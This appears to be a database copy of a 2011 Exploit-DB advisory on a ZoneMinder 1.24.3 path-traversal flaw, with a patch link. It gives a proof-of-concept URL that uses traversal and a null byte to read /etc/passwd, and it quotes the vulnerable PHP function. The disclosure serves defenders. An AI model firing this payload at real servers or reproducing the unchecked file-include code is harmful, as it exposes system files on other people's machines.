Lucene search
+L

ZoneMinder 1.24.3 - Remote File Inclusion

🗓️ 01 Aug 2011 00:00:00Reported by iyeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Zoneminder 1.24.3 Remote File Inclusion Vulnerability on Ubuntu 10.0

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-0332
24 Jan 201300:00
circl
CVE
CVE-2013-0332
20 Mar 201315:00
cve
Cvelist
CVE-2013-0332
20 Mar 201315:00
cvelist
Debian
[SECURITY] [DSA 2640-1] zoneminder security update
14 Mar 201318:04
debian
Debian CVE
CVE-2013-0332
20 Mar 201315:00
debiancve
Tenable Nessus
Debian DSA-2640-1 : zoneminder - several issues
15 Mar 201300:00
nessus
Exploit DB
ZoneMinder Video Server - packageControl Command Execution (Metasploit)
24 Jan 201300:00
exploitdb
NVD
CVE-2013-0332
20 Mar 201315:55
nvd
OpenVAS
Debian: Security Advisory (DSA-2640-1)
13 Mar 201300:00
openvas
OpenVAS
Debian Security Advisory DSA 2640-1 (zoneminder - several issues)
14 Mar 201300:00
openvas
Rows per page
# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability
# Date: 2011-07-22
# Author: Iye (iye[dot]cba-at-gmail[dot]com)
# Software Link: http://www.zoneminder.com/
# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested
# Tested on: Ubuntu 10.04

You must be authenticated as a user in the Web App to exploit it. It's
not a must to be admin.

POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00

Reported to proyect mantainer (Philip Coombes) on 2011-07-22
Fix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt

Vulnerable Code:

/var/www/zm/includes/functions.php
--------------------------------------------------------

function getSkinFile( $file )
{
    global $skinBase;
    $skinFile = false;
    foreach ( $skinBase as $skin )
    {
        $tempSkinFile = 'skins'.'/'.$skin.'/'.$file;
        if ( file_exists( $tempSkinFile ) )
            $skinFile = $tempSkinFile;
    }
    return( $skinFile );
}

--------------------------------------------------------

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Dec 2013 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
EPSS0.10195
41